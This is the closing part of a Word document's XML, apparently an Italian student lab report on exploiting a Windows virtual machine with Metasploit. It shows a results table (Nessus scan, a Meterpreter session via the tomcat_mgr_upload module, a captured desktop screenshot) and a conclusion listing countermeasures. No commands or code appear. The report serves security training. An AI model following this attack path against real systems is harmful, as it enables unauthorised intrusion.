              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000083">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability scan (Nessus)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000084">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Basic scan: 44 vulnerabilità rilevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000085">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000086">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Sessione con Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000087">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Meterpreter via tomcat_mgr_upload (LPORT 7777)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000088">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000089">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>VM o macchina fisica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008A">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Macchina virtuale Qemu/KVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008C">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Impostazioni di rete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008D">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.200.200/24, adapter VirtIO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000008F">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Webcam attive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000090">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Nessuna webcam presente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000091">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000092">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Screenshot del desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000093">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Catturato (tIZGLBqM.jpeg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000094">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000096">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Conclusioni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L'esercizio mostra come una singola configurazione debole — le credenziali del Tomcat Manager — permetta a un attaccante di ottenere il controllo completo del sistema, per giunta con i privilegi massimi (SYSTEM). In un contesto reale, le contromisure principali sarebbero: rimuovere o proteggere con credenziali robuste l'applicazione Manager, non esporre Tomcat su reti non fidate, mantenere il software aggiornato e applicare le patch indicate dal report Nessus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000098">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000099">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference w:type="default" r:id="rId26"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1200" w:right="1440" w:bottom="1200" w:left="1440" w:header="708" w:footer="708" w:gutter="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endnote w:type="separator" w:id="0">
    <w:p w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Endnotereference"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Endnotereference"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r>
        <w:rP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Consolas"/>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p w14:paraId="0000009A">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="6"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="555555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">BW2 · Giorno 5 — Exploit Windows con Metasploit    |    </w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">Pag.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footnote w:type="separator" w:id="0">
    <w:p w14:paraId="00000001">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Footnotereference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Footnotereference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w: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multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="260"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="900" w:hanging="260"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="260"/>
      </w:pPr>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name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word"/>
  </w:compat>
  <w:footnotePr>
    <w:footnote w:id="0"/>
    <w:footnote w:id="1"/>
  </w:footnotePr>
  <w:endnotePr>
    <w:endnote w:id="0"/>
    <w:endnote w:id="1"/>
  </w:endnotePr>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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault/>
  </w:docDefaults>
  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat w:val="on"/>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 w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:color w:val="2e74b5"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:color w:val="2e74b5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:color w:val="1f4d78"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2e74b5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:color w:val="2e74b5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:color w:val="1f4d78"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat w:val="on"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:rPr>
      <w:color w:val="0563c1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Footnotereference">
    <w:name w:val="Footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:r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styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footnotetext"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed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styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Endnotetext"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>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16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.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s>
</file>

<file path=word/_rels/endnotes.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
</file>

<file path=word/_rels/footer1.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Predefinito">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BW2 Giorno 5 - Exploit Windows con Metasploit</dc:title>
  <dc:creator>EPICODE Student</dc:creator>
  <cp:lastModifiedBy>Francesco Terraciano</cp:lastModifiedBy>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>